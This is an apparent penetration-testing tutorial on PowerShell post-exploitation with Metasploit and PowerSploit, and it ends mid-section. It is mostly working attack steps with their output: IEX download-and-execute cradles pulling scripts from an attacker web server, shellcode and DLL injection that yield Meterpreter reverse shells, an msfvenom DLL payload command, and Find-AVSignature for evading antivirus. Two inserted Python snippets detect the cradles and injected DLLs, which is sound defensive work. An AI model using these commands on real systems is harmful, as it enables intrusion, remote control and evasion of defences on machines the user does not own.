PowerShell is so powerful
What is PowerShell?
PowerShell is an automation platform and scripting language for Windows and Windows Server that allows you to simplify the management of your systems. Unlike other text-based shells, PowerShell harnesses the power of the .NET Framework, providing rich objects and a massive set of built-in functionality for taking control of your Windows environments.
msf post(exec_powershell) > use post/windows/manage/payload_inject
msf post(payload_inject) > set PAYLOAD windows/powershell_reverse_tcp
PAYLOAD => windows/powershell_reverse_tcp
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT no Select the amount of shells you want to spawn.
HANDLER false no Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/powershell_reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
msf post(payload_inject) > set LHOST
LHOST =>
msf post(payload_inject) > set SESSION
SESSION =>
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > run
[*] Running module against LAB
[*] Starting exploit/multi/handler
[*] Performing Architecture Check
[*] Started reverse SSL handler on :
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Interactive Powershell Session, Reverse TCP into process ID
[*] Opening process
[*] Starting the payload handler...
[*] Generating payload
[*] Allocating memory in procees
[*] Allocated memory at address , for byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process:
[*] Post module execution completed
msf post(payload_inject) > [*] Powershell session session opened (: -> :) at -- :: -
msf post(payload_inject) > sess
[*] Starting interaction with ..
Windows PowerShell running as user test on LAB
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\test>Get-Command -Name get-*
CommandType Name ModuleName
----------- ---- ----------
Function Get-DscConfiguration PSDesiredStateConfiguration
Function Get-DscLocalConfigurationManager PSDesiredStateConfiguration
Function Get-DscResource PSDesiredStateConfiguration
Function Get-FileHash Microsoft.PowerShell.Utility
Function Get-IseSnippet ISE
Function Get-LogProperties PSDiagnostics
Function Get-Verb
Function Get-Webclient
Cmdlet Get-Acl Microsoft.PowerShell.Security
Cmdlet Get-Alias Microsoft.PowerShell.Utility
Cmdlet Get-AppLockerFileInformation AppLocker
Cmdlet Get-AppLockerPolicy AppLocker
Cmdlet Get-AuthenticodeSignature Microsoft.PowerShell.Security
Cmdlet Get-BitsTransfer BitsTransfer
Cmdlet Get-ChildItem Microsoft.PowerShell.Management
Cmdlet Get-ChildPrimitive TShell
Cmdlet Get-CimAssociatedInstance CimCmdlets
Cmdlet Get-CimClass CimCmdlets
Cmdlet Get-CimInstance CimCmdlets
Cmdlet Get-CimSession CimCmdlets
Cmdlet Get-Command Microsoft.PowerShell.Core
Cmdlet Get-ComputerRestorePoint Microsoft.PowerShell.Management
Cmdlet Get-Content Microsoft.PowerShell.Management
Cmdlet Get-ControlPanelItem Microsoft.PowerShell.Management
Cmdlet Get-Counter Microsoft.PowerShell.Diagnostics
Cmdlet Get-Credential Microsoft.PowerShell.Security
Cmdlet Get-Culture Microsoft.PowerShell.Utility
Cmdlet Get-Date Microsoft.PowerShell.Utility
Cmdlet Get-Device TShell
Cmdlet Get-Event Microsoft.PowerShell.Utility
Cmdlet Get-EventLog Microsoft.PowerShell.Management
Cmdlet Get-EventSubscriber Microsoft.PowerShell.Utility
Cmdlet Get-ExecutionPolicy Microsoft.PowerShell.Security
Cmdlet Get-FormatData Microsoft.PowerShell.Utility
Cmdlet Get-Help Microsoft.PowerShell.Core
Cmdlet Get-History Microsoft.PowerShell.Core
Cmdlet Get-Host Microsoft.PowerShell.Utility
Cmdlet Get-HotFix Microsoft.PowerShell.Management
Cmdlet Get-Item Microsoft.PowerShell.Management
Cmdlet Get-ItemProperty Microsoft.PowerShell.Management
Cmdlet Get-Job Microsoft.PowerShell.Core
Cmdlet Get-JobTrigger PSScheduledJob
Cmdlet Get-Location Microsoft.PowerShell.Management
Cmdlet Get-Member Microsoft.PowerShell.Utility
Cmdlet Get-Module Microsoft.PowerShell.Core
Cmdlet Get-PfxCertificate Microsoft.PowerShell.Security
Cmdlet Get-Process Microsoft.PowerShell.Management
Cmdlet Get-PSBreakpoint Microsoft.PowerShell.Utility
Cmdlet Get-PSCallStack Microsoft.PowerShell.Utility
Cmdlet Get-PSDrive Microsoft.PowerShell.Management
Cmdlet Get-PSProvider Microsoft.PowerShell.Management
Cmdlet Get-PSSession Microsoft.PowerShell.Core
Cmdlet Get-PSSessionConfiguration Microsoft.PowerShell.Core
Cmdlet Get-PSSnapin Microsoft.PowerShell.Core
Cmdlet Get-Random Microsoft.PowerShell.Utility
Cmdlet Get-ResultSummary TShell
Cmdlet Get-ScheduledJob PSScheduledJob
Cmdlet Get-ScheduledJobOption PSScheduledJob
Cmdlet Get-Service Microsoft.PowerShell.Management
Cmdlet Get-SuiteName TShell
Cmdlet Get-TaskOutputPath TShell
Cmdlet Get-TraceSource Microsoft.PowerShell.Utility
Cmdlet Get-Transaction Microsoft.PowerShell.Management
Cmdlet Get-TroubleshootingPack TroubleshootingPack
Cmdlet Get-TypeData Microsoft.PowerShell.Utility
Cmdlet Get-UICulture Microsoft.PowerShell.Utility
Cmdlet Get-Unique Microsoft.PowerShell.Utility
Cmdlet Get-Variable Microsoft.PowerShell.Utility
Cmdlet Get-WinEvent Microsoft.PowerShell.Diagnostics
Cmdlet Get-WmiObject Microsoft.PowerShell.Management
Cmdlet Get-WSManCredSSP Microsoft.WSMan.Management
Cmdlet Get-WSManInstance Microsoft.WSMan.Management
PS C:\Users\test>
PowerSploit
PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test.
If you have Git installed, you can simply run the following command to fetch all files from the GitHub repository:
┌─[]─[/opt]
└──╼ sudo git clone https://github.com/PowerShellMafia/PowerSploit
[sudo] password for lab:
Cloning into 'PowerSploit'...
remote: Counting objects: , done.
remote: Total (delta ), reused (delta ), pack-reused
Receiving objects: % (/), MiB | KiB/s, done.
Resolving deltas: % (/), done.
Checking connectivity... done.
To run PowerSploit scripts, you need Microsoft PowerShell, which is installed by default on Windows 7 and later.
In the scenario used here, we have a Remote Desktop connection to the victim machine (Windows 7 Ultimate 64-bit), which has PowerShell installed, and we run the PowerSploit tools on it.
To make it easy to fetch and run PowerSploit scripts on the victim machine, we serve the repository over HTTP with a Python web server:
┌─[(master)]─[/opt/PowerSploit]
└──╼ python2 -m SimpleHTTPServer
Serving HTTP on port ...
- - [/Nov/ ::] "GET / HTTP/1.1" -
- - [/Nov/ ::] code , message File not found
- - [/Nov/ ::] "GET /favicon.ico HTTP/1.1" -
- - [/Nov/ ::] "GET /CodeExecution/ HTTP/1.1" -
- - [/Nov/ ::] "GET /CodeExecution/Invoke--Shellcode.ps1 HTTP/1.1" -
- - [/Nov/ ::] "GET /CodeExecution/Usage.md HTTP/1.1" -
- - [/Nov/ ::] "GET /Recon/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Persistence/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Recon/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Recon/Invoke-Portscan.ps1 HTTP/1.1" -
- - [/Nov/ ::] "GET /Exfiltration/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Exfiltration/Invoke-Mimikatz.ps1 HTTP/1.1" -
PowerSploit has categorized all the scripts in a pretty clear and organized manner:
| Name | Description |
|---|---|
| Antivirus Bypass | Find the bytes of a file that match a signature in the installed antivirus. |
| Code Execution | Used to execute code on the victim machine. |
| Exfiltration | Manipulate and collect information and data from the victim machine(s). |
| Persistence | Maintain control of the machine by adding persistence to scripts. |
| PE Tools | Handy PowerShell cmdlets for enumeration. |
| Recon | Perform reconnaissance tasks using the victim machine. |
| Reverse Engineering | Help perform reverse engineering and malware analysis. It has now been moved to PowerShellArsenal. |
| Script Modification | Create and manipulate scripts on the victim machine. |
This article covers as many PowerSploit scripts as possible; those not covered are left for the reader to try and test. Depending on the script, a particular environment may be required (for example, an Active Directory domain for some of the Exfiltration scripts).
Install and run a PowerShell script
IEX (New-Object Net.WebClient).DownloadString("http://<ip_address>/full_path/script_name.ps1")
Run in PowerShell, this command downloads the script and loads its functions into the current PowerShell process only; they are not visible to other processes and are gone when this one exits.
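The download-and-execute line above is the pattern a defender wants to catch, and PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the script text before it runs. The following Python is an added example, not part of this article or of PowerSploit: it classifies constructed 4104 script-block texts (two of them reuse cradle lines that appear later in this article), rating a download that feeds straight into IEX/Invoke-Expression as high, a bare download as medium, and tagging URLs whose path contains one of the PowerSploit folder names from the table above. The event tuples and the example.invalid URL are constructed sample data.

```python
import re
from urllib.parse import urlparse

# Folder names from the PowerSploit layout shown above. They only tag a finding;
# the detection itself keys on the generic download-and-execute pattern.
POWERSPLOIT_DIRS = {"AntivirusBypass", "CodeExecution", "Exfiltration", "Persistence",
                    "PETools", "Recon", "ScriptModification"}

EXEC_RE = re.compile(r"\b(IEX|Invoke-Expression)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.Download(String|File|Data)\s*\(", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'")]+""", re.IGNORECASE)

# Constructed sample events (event id, script block text) in the shape a defender
# gets from Script Block Logging (Event ID 4104). The first two reuse cradle lines
# from this article; the third is benign, the fourth downloads without executing.
SAMPLE_EVENTS = [
    (4104, 'IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/CodeExecution/Invoke-DllInjection.ps1")'),
    (4104, "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')"),
    (4104, "Get-Process | Where-Object { $_.CPU -gt 10 }"),
    (4104, "$wc = New-Object Net.WebClient; $wc.DownloadFile('http://example.invalid/setup.msi', 'C:\\Temp\\setup.msi')"),
]


def classify_script_block(text):
    """Return a finding for one script block, or None when no download is seen."""
    if DOWNLOAD_RE.search(text) is None:
        return None
    executes = EXEC_RE.search(text) is not None
    urls = URL_RE.findall(text)
    tags = set()
    for url in urls:
        for part in urlparse(url).path.split("/"):
            if part in POWERSPLOIT_DIRS:
                tags.add(part)
    return {
        # a download fed straight into IEX/Invoke-Expression is the cradle itself
        "severity": "high" if executes else "medium",
        "download_cradle": executes,
        "urls": urls,
        "powersploit_dirs": sorted(tags),
    }


def scan_events(events):
    """Classify every 4104 event; findings are returned in input order."""
    findings = []
    for event_id, text in events:
        if event_id != 4104:
            continue
        finding = classify_script_block(text)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["severity"], f["urls"], f["powersploit_dirs"])
```

Script Block Logging is off by default and has to be enabled through the "Turn on PowerShell Script Block Logging" policy; without it there are no 4104 events to feed this. Because the logged text is the script as PowerShell sees it, simple string obfuscation of the cradle (split strings, back-tick escapes) would evade the regexes here, so treat this as a starting point rather than a complete rule.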
Invoke-Shellcode
This cmdlet can be used to inject custom shellcode or a Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by antivirus and no file is written to disk.
We can load the Code Execution script “Invoke-Shellcode” with the download command shown above, pointed at the script's path on our web server; run it in a PowerShell window to install the “Invoke-Shellcode” function.
To list the module's parameters, type:
PS C:\Users\test> Get-Help -Parameter * Invoke-Shellcode
-ProcessID <UInt16>
Process ID of the process you want to inject shellcode into.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
-Shellcode <Byte[]>
Specifies an optional shellcode passed in as a byte array
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
-Force [<SwitchParameter>]
Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
Required? false
Position? named
Default value False
Accept pipeline input? false
Accept wildcard characters? false
-WhatIf [<SwitchParameter>]
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
-Confirm [<SwitchParameter>]
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:
Invoke-Shellcode -Force -Shellcode @(,..,)
We had also set up a multi/handler with a compatible payload in Metasploit; executing the above PowerSploit command gives us a Meterpreter shell.
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The local listener hostname
LPORT yes The local listener port
Exploit target:
Id Name
-- ----
Wildcard Target
msf exploit(handler) > set LHOST
LHOST =>
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://:/
[*] Starting the payload handler...
[*] : (UUID: d6c2d746722c5b0a/x86=/windows=/--T13::Z) Staging Native payload ...
[*] Meterpreter session opened (: -> :) at -- :: +
meterpreter > sysinfo
Computer : REMOTING
OS : Windows (Build , Service Pack ).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users :
Meterpreter : x86/win32
Please note that at the time of writing this article, only two Metasploit payloads are supported:
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https
If you want to inject into some other process, you can either create a new process and inject into it, or inject into an existing process.
Note that you should not see any errors. If, however, you see the following text:
Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.
you need to download Invoke--Shellcode (two hyphens) instead of Invoke-Shellcode. It seems the author is trying to make a point about downloading code.
Inject in an existing process:
Get Process ID (PID) of a process using “Get-Process”.
PS C:\> Get-Process
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
342 9 2344 5580 111 0.75 448 csrss
309 16 6652 14500 119 19.56 488 csrss
75 6 1756 4908 61 0.06 768 dwm
682 34 35540 42864 213 8.17 1572 explorer
0 0 0 24 0 0 Idle
797 22 5664 14256 66 3.92 584 lsass
166 7 2680 4804 30 0.02 592 lsm
166 15 3744 8252 80 0.17 996 msdtc
155 11 7556 15832 90 0.86 3560 notepad
187 17 23884 30316 210 0.42 1360 opera
859 39 34120 68456 282 18.16 1688 opera
209 19 19772 33076 209 1.89 1740 opera
201 19 36528 53156 235 1.22 1804 opera
212 24 41836 58452 246 3.75 2576 opera
95 7 1788 5468 67 0.03 2772 opera_crashreporter
3346 62 235960 243028 636 22.58 1284 powershell
194 13 65852 60388 564 0.42 1844 powershell
221 10 2612 5928 32 4.47 572 services
77 5 7348 11828 39 6.83 984 SLsvc
28 2 404 904 6 0.02 384 smss
278 16 6960 10992 95 0.19 1220 spoolsv
389 27 8936 14920 81 0.55 224 svchost
249 17 8656 10764 78 0.23 396 svchost
525 29 16788 20936 106 6.66 416 svchost
297 9 2612 6256 39 0.53 776 svchost
259 13 3492 6912 36 0.30 836 svchost
293 16 7800 10616 51 1.23 928 svchost
147 8 3652 7016 36 0.08 956 svchost
898 60 22232 31480 123 1.64 972 svchost
267 29 7448 12132 54 0.38 1060 svchost
123 9 2512 6024 38 0.03 1288 svchost
73 5 1264 3308 26 0.03 1304 svchost
44 3 960 2756 18 0.02 1432 svchost
227 12 3876 5660 53 0.05 2612 svchost
520 0 0 2764 6 4 System
133 9 2352 6668 53 0.03 1540 taskeng
244 14 3588 9104 87 0.09 1908 taskeng
51 6 1256 3432 45 0.05 3568 telnet
98 8 1576 4780 49 0.19 496 wininit
128 6 2004 5584 34 0.19 524 winlogon
185 28 46436 53176 565 0.47 2296 wsmprovhost
136 6 2916 5364 77 0.06 1620 wuauclt
Note that the “Id” field is the Process ID (PID) of the corresponding process name.
Inject the Metasploit payload into the “svchost” process with PID 1228. Note that I have removed the “-Force” switch from the command, so it now asks for user confirmation before injecting the payload.
PS C:\> Invoke-Shellcode -ProcessId -Payload windows/meterpreter/reverse_https -Lhost -Lport
Attempt to execute -bit shellcode from -bit Powershell. Note: This process takes about one
minute. Be patient! You will also see some artifacts of the script loading in the other process.
Do you want to launch the payload from x86 Powershell?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"):
PS C:\>
After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://:/
[*] Starting the payload handler...
[*] : (UUID: 0c503b02c3240bfa/x86=/windows=/--08T14::09Z) Staging Native payload ...
[*] Meterpreter session opened (: -> :) at -- :: +
meterpreter >
Inject in a new process:
Create a new hidden process and inject the payload into it:
PS C:\> Start-Process c:\windows\system32\cmd.exe -WindowStyle Hidden
PS C:\> Get-Process cmd
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
cmd
PS C:\> Invoke-Shellcode -ProcessId -Payload windows/meterpreter/reverse_https -Lhost -Lport
Attempt to execute -bit shellcode from -bit Powershell. Note: This process takes about one
minute. Be patient! You will also see some artifacts of the script loading in the other process.
Do you want to launch the payload from x86 Powershell?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
PS C:\>
And we get a Meterpreter shell on the attacking machine:
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://:/
[*] Starting the payload handler...
[*] : (UUID: e4c8c2587cfaed17/x86=/windows=/--08T14::14Z) Staging Native payload ...
[*] Meterpreter session opened (: -> :) at -- :: +
meterpreter >
Invoke-DllInjection
This cmdlet injects a DLL file into an existing process identified by its Process ID (PID). The only disadvantage of this cmdlet is that it requires the DLL to be written to disk.
We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/CodeExecution/Invoke-DllInjection.ps1")
PS C:\> Get-Help Invoke-DllInjection
NAME
Invoke-DllInjection
SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String> [<CommonParameters>]
DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
RELATED LINKS
http://www.exploit-monday.com
REMARKS
To see the examples, type: "get-help Invoke-DllInjection -examples".
For more information, type: "get-help Invoke-DllInjection -detailed".
For technical information, type: "get-help Invoke-DllInjection -full".
Generate the Meterpreter DLL with msfvenom and save it into the web server's directory:
┌─[(upstream-master)]─[/opt/metasploit-framework]
└──╼ ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f dll > /opt/PowerSploit/msf.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: bytes
Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice.
Create a process in hidden mode and inject the DLL into it.
PS C:\Users\test\Desktop> Get-Process -Name notepad
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
60 3 1008 2032 56 0.00 352 notepad
57 3 976 4192 55 0.00 1568 notepad
PS C:\Users\test\Desktop> Invoke-DllInjection -ProcessID 1568 -Dll .\msf.dll
Size(K) ModuleName FileName
------- ---------- --------
20 msf.dll C:\Users\test\Desktop\msf.dll
PS C:\Users\test\Desktop> Get-Process -Module -Id 1568
Size(K) ModuleName FileName
------- ---------- --------
192 notepad.exe C:\Windows\system32\notepad.exe
1288 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll
852 kernel32.dll C:\Windows\system32\kernel32.dll
300 KERNELBASE.dll C:\Windows\system32\KERNELBASE.dll
644 ADVAPI32.dll C:\Windows\system32\ADVAPI32.dll
688 msvcrt.dll C:\Windows\system32\msvcrt.dll
100 sechost.dll C:\Windows\SYSTEM32\sechost.dll
648 RPCRT4.dll C:\Windows\system32\RPCRT4.dll
312 GDI32.dll C:\Windows\system32\GDI32.dll
804 USER32.dll C:\Windows\system32\USER32.dll
40 LPK.dll C:\Windows\system32\LPK.dll
628 USP10.dll C:\Windows\system32\USP10.dll
492 COMDLG32.dll C:\Windows\system32\COMDLG32.dll
348 SHLWAPI.dll C:\Windows\system32\SHLWAPI.dll
1656 COMCTL32.dll C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\COMCTL32.dll
12592 SHELL32.dll C:\Windows\system32\SHELL32.dll
324 WINSPOOL.DRV C:\Windows\system32\WINSPOOL.DRV
1396 ole32.dll C:\Windows\system32\ole32.dll
580 OLEAUT32.dll C:\Windows\system32\OLEAUT32.dll
36 VERSION.dll C:\Windows\system32\VERSION.dll
124 IMM32.DLL C:\Windows\system32\IMM32.DLL
816 MSCTF.dll C:\Windows\system32\MSCTF.dll
48 CRYPTBASE.dll C:\Windows\system32\CRYPTBASE.dll
256 uxtheme.dll C:\Windows\system32\uxtheme.dll
76 dwmapi.dll C:\Windows\system32\dwmapi.dll
20 msf.dll C:\Users\test\Desktop\msf.dll
304 apphelp.dll C:\Windows\system32\apphelp.dll
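The module listing above is exactly the artifact Invoke-DllInjection leaves behind: a DLL loaded from a user's Desktop among modules that otherwise all live under C:\Windows. The Python below is an added example, not part of this article or of PowerSploit: it parses a constructed excerpt of that Get-Process -Module table (values copied from the listing above) and reports every module whose on-disk path is outside the assumed trusted locations (C:\Windows, C:\Program Files, C:\Program Files (x86)); the system drive letter and that prefix list are assumptions you would adapt per host.

```python
# Constructed excerpt of the "Get-Process -Module -Id 1568" listing above
# (column layout as PowerShell prints it; values copied from the article).
SAMPLE_MODULE_LISTING = r"""
Size(K) ModuleName FileName
------- ---------- --------
192 notepad.exe C:\Windows\system32\notepad.exe
1288 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll
1656 COMCTL32.dll C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\COMCTL32.dll
20 msf.dll C:\Users\test\Desktop\msf.dll
304 apphelp.dll C:\Windows\system32\apphelp.dll
"""

# Directories a module is normally loaded from (assumed system drive C:).
# Anything else, such as a user profile, %TEMP%, ProgramData or a network
# share, deserves a look.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_module_listing(text):
    """Parse the three-column Get-Process -Module table into dicts."""
    modules = []
    for line in text.splitlines():
        # size, name, then the remainder as the path (it may contain spaces)
        parts = line.split(None, 2)
        if len(parts) != 3 or not parts[0].isdigit():
            continue  # header, separator and blank lines
        modules.append({"size_kb": int(parts[0]), "name": parts[1], "path": parts[2]})
    return modules


def find_untrusted_modules(modules):
    """Modules whose on-disk path lies outside the trusted system locations."""
    return [m for m in modules
            if not m["path"].lower().startswith(TRUSTED_PREFIXES)]


def main():
    modules = parse_module_listing(SAMPLE_MODULE_LISTING)
    for m in find_untrusted_modules(modules):
        print(f"untrusted module {m['name']} loaded from {m['path']} ({m['size_kb']} KB)")


if __name__ == "__main__":
    main()
```

On a live host the same table comes from `Get-Process -Module -Id <pid>` redirected to a file, which can then be fed to this parser. The check only works for the DLL-injection case, because the injected library has a path on disk; the Invoke-Shellcode technique described earlier leaves no module behind, so it needs process-memory or script-logging based detection instead.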
Find-AVSignature
This cmdlet splits a file into chunks of a given byte size. The chunks are written to separate files, and the installed antivirus detects, quarantines or removes the ones that contain a signature. By noting which files were removed, we can locate the parts of the original file that carry the AV signature.
We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/AntivirusBypass/Find-AVSignature.ps1")
PS C:\> Get-Help Find-AVSignature
NAME
Find-AVSignature
SYNOPSIS
Locate tiny AV signatures.
PowerSploit Function: Find-AVSignature
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Find-AVSignature [-StartByte] <UInt32> [-EndByte] <String> [-Interval] <UInt32> [[-Path] <String>] [[-OutPath] <Str
ing>] [[-BufferLen] <UInt32>] [-Force] [<CommonParameters>]
DESCRIPTION
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
RELATED LINKS
http://obscuresecurity.blogspot.com///finding-simple-av-signatures-with.html
https://github.com/mattifestation/PowerSploit
http://www.exploit-monday.com/
http://heapoverflow.com/f0rums/project.php?issueid=&filter=changes&page=
REMARKS
To see the examples, type: "get-help Find-AVSignature -examples".
For more information, type: "get-help Find-AVSignature -detailed".
For technical information, type: "get-help Find-AVSignature -full".
Running “Find-AVSignature” on a Meterpreter Windows executable (“-Path” is the file to split, “-OutPath” the location that receives the chunks; the parameter may only be given once):
Find-AVSignature -StartByte 0 -EndByte 6144 -Interval 50 -Path c:\users\master\Desktop\msf.exe -OutPath c:\users\master\Desktop\run1 -Verbose
Invoke-Portscan
This cmdlet runs a port scan against other hosts to find open ports. Its options resemble Nmap's in a number of ways, though not all of Nmap's features are supported.
We can easily install the Recon PowerShell script “Invoke-Portscan” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Recon/Invoke-Portscan.ps1")
PS C:\> Get-Help Invoke-Portscan
NAME
Invoke-Portscan
SYNOPSIS
Simple portscan module
PowerSploit Function: Invoke-Portscan
Author: Rich Lundeen (http://webstersProdigy.net)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>] [-TopPorts <Strin
g>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>] [-Threads <Int32>] [-nHosts <
Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>] [-GrepOut <String>] [-XmlOut <Str
ing>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter] [-quiet] [-ForceOverwrite] [<CommonParam
eters>]
Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>] [-TopPorts <Stri
ng>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>] [-Threads <Int32>] [-nHosts
<Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>] [-GrepOut <String>] [-XmlOut <St
ring>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter] [-quiet] [-ForceOverwrite] [<CommonPara
meters>]
DESCRIPTION
Does a simple port scan using regular sockets, based (pretty) loosely on nmap
RELATED LINKS
http://webstersprodigy.net
REMARKS
To see the examples, type: "get-help Invoke-Portscan -examples".
For more information, type: "get-help Invoke-Portscan -detailed".
For technical information, type: "get-help Invoke-Portscan -full".
Run a port scan for a list of hosts and ports:
A number of options let you customize the scan; use “Get-Help Invoke-Portscan -Full” to see all of them.
It also supports saving output to files in Nmap-style formats (GNMAP, NMAP and XML) using the -oG, -oX and -oA switches.
Invoke-ReverseDnsLookup
This cmdlet looks up the DNS PTR record for one or more IP addresses.
We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Recon/Invoke-ReverseDnsLookup.ps1")
PS C:\> Get-Help Invoke-ReverseDnsLookup
NAME
Invoke-ReverseDnsLookup
SYNOPSIS
Perform a reverse DNS lookup scan on a range of IP addresses.
PowerSploit Function: Invoke-ReverseDnsLookup
Author: Matthew Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-ReverseDnsLookup [-IpRange] <String> [<CommonParameters>]
DESCRIPTION
Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS rec
onnaisance prior to conducting an authorized penetration test.
RELATED LINKS
http://www.exploit-monday.com
https://github.com/mattifestation/PowerSploit
REMARKS
To see the examples, type: "get-help Invoke-ReverseDnsLookup -examples".
For more information, type: "get-help Invoke-ReverseDnsLookup -detailed".
For technical information, type: "get-help Invoke-ReverseDnsLookup -full".
Execute the cmdlet using the command below, which accepts an IP address or range in the “-IpRange” switch:
PS C:\> Invoke-ReverseDnsLookup -IpRange /
HostName IP
-------- --
google-public-dns-a.google.com
...
Get-HttpStatus
This cmdlet runs a dictionary (wordlist) check against a web server to find the HTTP status of paths or files on an HTTP/HTTPS service. It is not very feature-rich and does not support a nested dictionary attack. It accepts a file containing the path or file names whose HTTP status should be checked on the web server.
We can easily install the Recon PowerShell script “Get-HttpStatus” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Recon/Get-HttpStatus.ps1")
PS C:\> Get-Help Get-HttpStatus
NAME
Get-HttpStatus
SYNOPSIS
Returns the HTTP Status Codes and full URL for specified paths.
PowerSploit Function: Get-HttpStatus
Author: Chris Campbell (@obscuresec)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL] [<CommonParameters>]
DESCRIPTION
A script to check for the existence of a path or file on a webserver.
RELATED LINKS
http://obscuresecurity.blogspot.com
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
REMARKS
To see the examples, type: "get-help Get-HttpStatus -examples".
For more information, type: "get-help Get-HttpStatus -detailed".
For technical information, type: "get-help Get-HttpStatus -full".
Execute this cmdlet using the following command (the dictionary file used here is DirBuster's):
